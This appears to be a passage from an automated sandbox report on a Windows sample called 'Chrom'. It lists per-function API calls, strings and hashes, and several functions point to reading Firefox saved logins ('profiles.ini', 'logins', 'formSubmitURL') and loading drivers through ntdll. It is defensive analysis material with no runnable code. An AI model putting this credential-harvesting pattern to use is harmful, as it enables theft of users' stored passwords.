                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 829165378-0
                                                                                                                                                        • Opcode ID: 28d1f74300f5acc619f393cf0bab4760741c336622d5a51f223752340646ab01
                                                                                                                                                        • Instruction ID: 2e860b65d83457e398c211b7ef8e3c32b9ff1fce9bb52c2d4974f341227d48e7
                                                                                                                                                        • Opcode Fuzzy Hash: 28d1f74300f5acc619f393cf0bab4760741c336622d5a51f223752340646ab01
                                                                                                                                                        • Instruction Fuzzy Hash: 3E519D79500708ABEB21AF70DC88E6E7BB5FB44301F10493AF552A21F1C7B9AA54DF18
                                                                                                                                                        Function 00410E8D Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 263windowregistryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040D8B5: LoadMenuW.USER32(00000000), ref: 0040D8BD
                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00410F9A
                                                                                                                                                        • CreateStatusWindowW.COMCTL32(50000000,0044F4CC,?,00000101), ref: 00410FB5
                                                                                                                                                        • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00410FCD
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410FDC
                                                                                                                                                        • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 00410FE9
                                                                                                                                                        • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 00411013
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00411020
                                                                                                                                                        • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411047
                                                                                                                                                        • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 0041110F
                                                                                                                                                        • ShowWindow.USER32(?,?), ref: 00411145
                                                                                                                                                        • GetFileAttributesW.KERNEL32(0045F078), ref: 00411176
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,0045F078), ref: 00411186
                                                                                                                                                        • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 004111C1
                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000002,?), ref: 004111FB
                                                                                                                                                        • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0041120E
                                                                                                                                                          • Part of subcall function 004054CF: wcslen.MSVCRT ref: 004054EC
                                                                                                                                                          • Part of subcall function 004054CF: SendMessageW.USER32(?,00001061,?,?), ref: 00405510
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Message$SendWindow$Create$HandleLoadMenuModule$AttributesFileImagePathRegisterShowStatusTempToolbarmemcpywcslen
                                                                                                                                                        • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                        • API String ID: 2327787793-2103577948
                                                                                                                                                        • Opcode ID: 777271bfed07e17862ed6d8aebfb67f85c61c800a569c266c8f994dafd1a2857
                                                                                                                                                        • Instruction ID: 95a3d167940fe3ebdcb7c516ac7433945ec5bcbd5685e9f747196b27d1c22ec3
                                                                                                                                                        • Opcode Fuzzy Hash: 777271bfed07e17862ed6d8aebfb67f85c61c800a569c266c8f994dafd1a2857
                                                                                                                                                        • Instruction Fuzzy Hash: FEA1BF71640388AFEB11DF64CC89BCA3FA5AF55304F0444B9FE08AF292C7B59548CB69
                                                                                                                                                        Function 00446665 Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(0040E0C9,?,00000000), ref: 0044667B
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040E0C9,?,00000000), ref: 00446696
                                                                                                                                                        • GetFileVersionInfoW.VERSION(0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466A6
                                                                                                                                                        • VerQueryValueW.VERSION(00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466B9
                                                                                                                                                        • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,00453E4C,0040E0C9,?,0040E0C9,00000000,?,00000000,00000000,0040E0C9,?,00000000), ref: 004466F6
                                                                                                                                                        • _snwprintf.MSVCRT ref: 00446716
                                                                                                                                                        • wcscpy.MSVCRT ref: 00446740
                                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 004467F0
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                                                        • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                        • API String ID: 1223191525-1542517562
                                                                                                                                                        • Opcode ID: d4dd335fc41ad2063f46854916b7d01aa3fbdbc7a054ebd33d2c839f8f36a85c
                                                                                                                                                        • Instruction ID: d5653fb1b2b7478917158de9cf610de98b6740d2027696868c611b94d6ffcb81
                                                                                                                                                        • Opcode Fuzzy Hash: d4dd335fc41ad2063f46854916b7d01aa3fbdbc7a054ebd33d2c839f8f36a85c
                                                                                                                                                        • Instruction Fuzzy Hash: C64113B2A00218BAD704EF91DD41DDEB7ACFF09304F11451BB905B3142EF78A659CBA9
                                                                                                                                                        Function 00410381 Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 004103C4
                                                                                                                                                        • memset.MSVCRT ref: 004103D9
                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004103EB
                                                                                                                                                        • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00410409
                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410422
                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 0041042D
                                                                                                                                                        • SendMessageW.USER32(?,00001003,00000001,?), ref: 00410446
                                                                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0041045A
                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,0000000A), ref: 00410465
                                                                                                                                                        • SendMessageW.USER32(?,00001003,00000000,?), ref: 0041047D
                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00410489
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00410498
                                                                                                                                                        • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 004104AA
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 004104B5
                                                                                                                                                        • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 004104C7
                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004104D8
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 004104E0
                                                                                                                                                        • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 004104FB
                                                                                                                                                        • ImageList_AddMasked.COMCTL32(?,?,?), ref: 0041050B
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00410517
                                                                                                                                                        • DeleteObject.GDI32(?), ref: 0041051D
                                                                                                                                                        • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0041053A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 304928396-0
                                                                                                                                                        • Opcode ID: d592f4ebbee006bb6ed55b3a21e33839510d47025a9d6a972f2f5b101dbbb872
                                                                                                                                                        • Instruction ID: 7f26086368a8811bff09cc620d8db4ef3709b429c5b5910aef32137d5162c258
                                                                                                                                                        • Opcode Fuzzy Hash: d592f4ebbee006bb6ed55b3a21e33839510d47025a9d6a972f2f5b101dbbb872
                                                                                                                                                        • Instruction Fuzzy Hash: 84419675640304BFE720AF60DC8AFD77798FB49745F000839B799A61D1C7F6A8849B29
                                                                                                                                                        Function 0040F696 Relevance: 31.7, APIs: 10, Strings: 8, Instructions: 185COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s$o<@
                                                                                                                                                        • API String ID: 1607361635-3679438452
                                                                                                                                                        • Opcode ID: 4731570b1df8245d9ba0a7b5cb35d7f58960f04d5df534be5afec6bb741ccfcf
                                                                                                                                                        • Instruction ID: c9c9c2a4c0014aec28f6a6d1c50fe2906790d152b0bc8d99d06e27721e28e2e0
                                                                                                                                                        • Opcode Fuzzy Hash: 4731570b1df8245d9ba0a7b5cb35d7f58960f04d5df534be5afec6bb741ccfcf
                                                                                                                                                        • Instruction Fuzzy Hash: 5B61C031900208EFDF24EF54CC85EEE7779EF45314F1041AAF804AB292DB39AA94CB55
                                                                                                                                                        Function 004134F0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.MSVCRT ref: 00413513
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2E8
                                                                                                                                                          • Part of subcall function 0040A2DE: wcslen.MSVCRT ref: 0040A2F2
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscpy.MSVCRT ref: 0040A306
                                                                                                                                                          • Part of subcall function 0040A2DE: wcscat.MSVCRT ref: 0040A314
                                                                                                                                                          • Part of subcall function 0040A157: GetFileAttributesW.KERNELBASE(?,0040DF98,?,0040E04F,00000000,?,00000000,00000208,?), ref: 0040A15B
                                                                                                                                                        • wcscpy.MSVCRT ref: 00413577
                                                                                                                                                        • wcscpy.MSVCRT ref: 00413588
                                                                                                                                                        • memset.MSVCRT ref: 004135A1
                                                                                                                                                        • memset.MSVCRT ref: 004135B6
                                                                                                                                                        • _snwprintf.MSVCRT ref: 004135D0
                                                                                                                                                        • wcscpy.MSVCRT ref: 004135E3
                                                                                                                                                        • memset.MSVCRT ref: 0041360F
                                                                                                                                                        • memset.MSVCRT ref: 0041366E
                                                                                                                                                        • memset.MSVCRT ref: 00413683
                                                                                                                                                        • _snwprintf.MSVCRT ref: 0041369F
                                                                                                                                                        • wcscpy.MSVCRT ref: 004136B2
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                        • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                                                                                                                        • API String ID: 2454223109-2600475665
                                                                                                                                                        • Opcode ID: f5d1d8963b751ecd1a35c643c487ff4ade738b5c65df3c9a6eb4e6993c7bb1e1
                                                                                                                                                        • Instruction ID: 9f98b962bf64fc41312729a32297df74b75f7af46428a9f2a50f724a012a647b
                                                                                                                                                        • Opcode Fuzzy Hash: f5d1d8963b751ecd1a35c643c487ff4ade738b5c65df3c9a6eb4e6993c7bb1e1
                                                                                                                                                        • Instruction Fuzzy Hash: C6510DB294122CBADB20EB55CD45ECF77BCAF55754F0140E6B508A2142EA385B84CFAA
                                                                                                                                                        Function 00416E84 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                        • API String ID: 3143752011-1996832678
                                                                                                                                                        • Opcode ID: 3ea85b475066484b5fca8c45ce1ff678e1ca65170c514b6952232c65087133fa
                                                                                                                                                        • Instruction ID: 38fb58bcee569138cf1c6d38f2492e07bff0653b862c37002d8b5a61cc6a81ae
                                                                                                                                                        • Opcode Fuzzy Hash: 3ea85b475066484b5fca8c45ce1ff678e1ca65170c514b6952232c65087133fa
                                                                                                                                                        • Instruction Fuzzy Hash: 0A31C8B2501309BDE720BB559D829BE737C9B41715F21806FF61462182E67C9E858B19
                                                                                                                                                        Function 00413A57 Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040BB60,?,000000FF,00000000,00000104), ref: 00413A6A
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413A81
                                                                                                                                                        • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00413A93
                                                                                                                                                        • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00413AA5
                                                                                                                                                        • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00413AB7
                                                                                                                                                        • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00413AC9
                                                                                                                                                        • GetProcAddress.KERNEL32(NtQueryObject), ref: 00413ADB
                                                                                                                                                        • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00413AED
                                                                                                                                                        • GetProcAddress.KERNEL32(NtResumeProcess), ref: 00413AFF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                        • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                        • API String ID: 667068680-2887671607
                                                                                                                                                        • Opcode ID: 688ae1a650c2843fb022fdb0e80312dcfa35bd94c2434b86a4149cb05d0d823f
                                                                                                                                                        • Instruction ID: 3094f08e780b7640ee0285fea3f53bfe9e93f2d39e0d9e3b23931a4aeb60f93e
                                                                                                                                                        • Opcode Fuzzy Hash: 688ae1a650c2843fb022fdb0e80312dcfa35bd94c2434b86a4149cb05d0d823f
                                                                                                                                                        • Instruction Fuzzy Hash: 91019774D41714AACB2B9F72ED19A153FA0F704B6371004B7E805922A3DA7CC20CCE8D
                                                                                                                                                        Function 0040913E Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 260COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040D0D4: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040118B,?,?,?,?,000003FF), ref: 0040D0F2
                                                                                                                                                          • Part of subcall function 0040D0D4: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040D146
                                                                                                                                                          • Part of subcall function 0040D19E: _wcsicmp.MSVCRT ref: 0040D1D8
                                                                                                                                                        • memset.MSVCRT ref: 004091C9
                                                                                                                                                        • memset.MSVCRT ref: 004091DE
                                                                                                                                                        • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,formSubmitURL,guid,00000000,00000132,00000000,00000131,00000000), ref: 00409349
                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040935D
                                                                                                                                                        • memset.MSVCRT ref: 0040937E
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 004093B2
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093C9
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093E0
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 004093F7
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000000FF,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040940E
                                                                                                                                                          • Part of subcall function 0040911D: _wtoi64.MSVCRT ref: 00409121
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00409425
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040943C
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00409453
                                                                                                                                                          • Part of subcall function 00408F0A: memset.MSVCRT ref: 00408F30
                                                                                                                                                          • Part of subcall function 00408F0A: memset.MSVCRT ref: 00408F47
                                                                                                                                                          • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408F6A
                                                                                                                                                          • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FC3
                                                                                                                                                          • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FDA
                                                                                                                                                          • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00408FED
                                                                                                                                                          • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409000
                                                                                                                                                          • Part of subcall function 00408F0A: strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409013
                                                                                                                                                          • Part of subcall function 00408F0A: wcscpy.MSVCRT ref: 00409022
                                                                                                                                                          • Part of subcall function 00408F0A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409048
                                                                                                                                                          • Part of subcall function 00408F0A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00409062
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$strcpy$memset$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                        • String ID: formSubmitURL$guid$logins$null
                                                                                                                                                        • API String ID: 1954096314-80472114
                                                                                                                                                        • Opcode ID: 7e317ccb2718545a6502de2a7b504e547521713b1ef01b8e4aca76a10726caf1
                                                                                                                                                        • Instruction ID: ed379e5704be75f3e6866550497b864d9ddced9f47acb00a3616e2846d1467bc
                                                                                                                                                        • Opcode Fuzzy Hash: 7e317ccb2718545a6502de2a7b504e547521713b1ef01b8e4aca76a10726caf1
                                                                                                                                                        • Instruction Fuzzy Hash: 318175B1D4021EBAEF20BBA18C82EEE767DEF04318F11417BB514B61D2DA385E459F64
                                                                                                                                                        Function 0040FCDC Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                        • API String ID: 2000436516-3842416460
                                                                                                                                                        • Opcode ID: 5fe8db686efc772fa6b4f80b717c1a9ed323b4090c8ee1f0a390374eed08aaa7
                                                                                                                                                        • Instruction ID: de9e738956947f7a13c6b231079008692334f1b8e04242fb28e7d90039f4c50e
                                                                                                                                                        • Opcode Fuzzy Hash: 5fe8db686efc772fa6b4f80b717c1a9ed323b4090c8ee1f0a390374eed08aaa7
